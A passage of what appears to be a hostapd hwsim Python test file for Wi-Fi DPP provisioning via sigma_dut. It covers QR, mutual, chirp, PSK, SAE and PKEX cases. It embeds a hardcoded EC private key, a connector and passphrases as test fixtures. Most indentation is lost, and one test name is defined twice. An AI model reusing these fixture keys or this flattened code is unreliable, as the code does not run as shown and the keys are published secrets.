ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
def start_dpp_ap(apdev):
params = {"ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey}
try:
hapd = hostapd.add_ap(apdev, params)
    except Exception:
raise HwsimSkip("DPP not supported")
return hapd
def test_sigma_dut_dpp_qr_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_configurator(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (to become Configurator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=configurator ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPNetworkRole,Configurator,DPPBS,QR,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (extra check)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev,
extra="DPPAuthDirection,Mutual,")
def test_sigma_dut_dpp_qr_mutual_init_enrollee_mud_url(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (MUD URL)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev,
mud_url="https://example.com/mud")
def run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra='',
mud_url=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hexstr = res.split(',')[3]
        uri = from_hex(hexstr)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,%sDPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes" % extra
if mud_url:
cmd += ",MUDURL," + mud_url
res = sigma_dut_cmd_check(cmd, timeout=10)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if mud_url:
ev = dev[1].wait_event(["DPP-MUD-URL"], timeout=1)
if ev is None:
raise Exception("DPP MUD URL not reported")
if ev.split(' ')[1] != mud_url:
raise Exception("Unexpected MUD URL value: " + ev)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_init_conf_mutual(dev, id1, conf_id, own_id=None):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id1, to_hex("DPPNET01"), conf_id)
if own_id is not None:
cmd += " own=%d" % own_id
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_resp_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, ',DPPDelayQRResponse,1')
def run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, extra=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hexstr = res.split(',')[3]
        uri = from_hex(hexstr)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_conf_mutual,
args=(dev[1], id1, conf_id, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,20,DPPWaitForConnect,Yes"
if extra:
cmd += extra
res = sigma_dut_cmd(cmd, timeout=25)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_resp_conf_mutual(dev, conf_id, uri):
logger.info("Starting DPP responder/configurator in a thread")
dev.set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"),
conf_id))
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP listen")
if uri:
ev = dev.wait_event(["DPP-SCAN-PEER-QR-CODE"], timeout=10)
if ev is None:
raise Exception("QR Code scan for mutual authentication not requested")
dev.dpp_qr_code(uri)
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP responder/configurator done")
def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, False)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, True)
def run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, resp_pending):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hexstr = res.split(',')[3]
        uri = from_hex(hexstr)
logger.info("URI from sigma_dut: " + uri)
if not resp_pending:
dev[1].dpp_qr_code(uri)
uri = None
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_resp_conf_mutual,
args=(dev[1], conf_id, uri))
t.start()
time.sleep(1)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,10,DPPWaitForConnect,Yes"
res = sigma_dut_cmd(cmd, timeout=15)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_psk(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (PSK)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-psk ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_sae(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (SAE)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
check_sae_capab(dev[0])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
dev[0].set("sae_groups", "")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-sae ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_configurator_1(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1)
def test_sigma_dut_dpp_qr_init_configurator_2(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 2)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 2)
def test_sigma_dut_dpp_qr_init_configurator_3(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 3)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 3)
def test_sigma_dut_dpp_qr_init_configurator_4(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 4)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 4)
def test_sigma_dut_dpp_qr_init_configurator_5(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 5)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 5)
def test_sigma_dut_dpp_qr_init_configurator_6(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 6)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 6)
def test_sigma_dut_dpp_qr_init_configurator_7(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 7)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 7)
def test_sigma_dut_dpp_qr_init_configurator_both(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator or Enrollee (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, "Both")
def test_sigma_dut_dpp_qr_init_configurator_neg_freq(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (neg_freq)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, extra='DPPSubsequentChannel,81/11')
def test_sigma_dut_dpp_qr_init_configurator_mud_url(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (MUD URL)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1,
mud_url="https://example.com/mud")
def run_sigma_dut_dpp_qr_init_configurator(dev, apdev, conf_idx,
prov_role="Configurator",
extra=None, mud_url=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
if mud_url:
dev[1].set("dpp_mud_url", mud_url)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,%s,DPPConfIndex,%d,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" % (prov_role, conf_idx)
if extra:
cmd += "," + extra
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if mud_url and ",MUDURL," + mud_url not in res:
raise Exception("Unexpected result (missing MUD URL): " + res)
finally:
dev[1].set("dpp_mud_url", "")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_incompatible_roles_init(dev, apdev):
"""sigma_dut DPP roles incompatible (Initiator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee_mutual(dev, id1, own_id):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d own=%d role=enrollee" % (id1, own_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED",
"DPP-NOT-COMPATIBLE"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_incompatible_roles_resp(dev, apdev):
"""sigma_dut DPP roles incompatible (Responder)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_enrollee_mutual, args=(dev[1], id1, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_enrollee_chirp(dev, apdev):
"""sigma_dut DPP/QR as chirping Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
conf_id = dev[1].dpp_configurator_add(key=csign)
idc = dev[1].dpp_qr_code(uri)
dev[1].dpp_bootstrap_set(idc, conf="sta-dpp", configurator=conf_id,
ssid="DPPNET01")
dev[1].dpp_listen(2437)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,16,DPPWaitForConnect,Yes,DPPChirp,Enable", timeout=20)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_enrollee_chirp(dev, id1):
logger.info("Starting chirping Enrollee in a thread")
time.sleep(0.1)
cmd = "DPP_CHIRP own=%d" % id1
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP chirping")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=15)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP enrollee done")
def test_sigma_dut_dpp_qr_configurator_chirp(dev, apdev):
"""sigma_dut DPP/QR as Configurator waiting for chirp"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
id1 = dev[1].dpp_bootstrap_gen(chan="81/1")
uri = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_enrollee_chirp, args=(dev[1], id1))
t.start()
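        # DPPChirp,Enable with DPPChirpChannel,6 tells sigma_dut (Configurator)
        # to wait for the Enrollee's Presence Announcement (chirp) on channel 6
        # before starting authentication.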
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,16,DPPChirp,Enable,DPPChirpChannel,6", timeout=20)
t.join()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_qr_enrollee_chirp(dev, apdev, params):
"""sigma_dut DPP/QR AP as chirping Enrollee"""
check_dpp_capab(dev[0], min_ver=2)
check_dpp_capab(dev[1])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
conf_id = dev[0].dpp_configurator_add(key=csign)
idc = dev[0].dpp_qr_code(uri)
dev[0].dpp_bootstrap_set(idc, conf="ap-dpp", configurator=conf_id,
ssid="DPPNET01")
dev[0].dpp_listen(2437)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,16,DPPChirp,Enable", timeout=20)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[1].set("dpp_config_processing", "2")
id = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id)
dev[1].dpp_listen(2437)
dev[0].dpp_auth_init(uri=uri, conf="sta-dpp", ssid="DPPNET01",
configurator=conf_id)
dev[1].wait_connected(timeout=20)
sigma_dut_cmd_check("ap_reset_default,program,DPP")
finally:
dev[1].set("dpp_config_processing", "0", allow_fail=True)
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_init_configurator(dev, apdev):
"""sigma_dut DPP/PKEX initiator as Configurator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
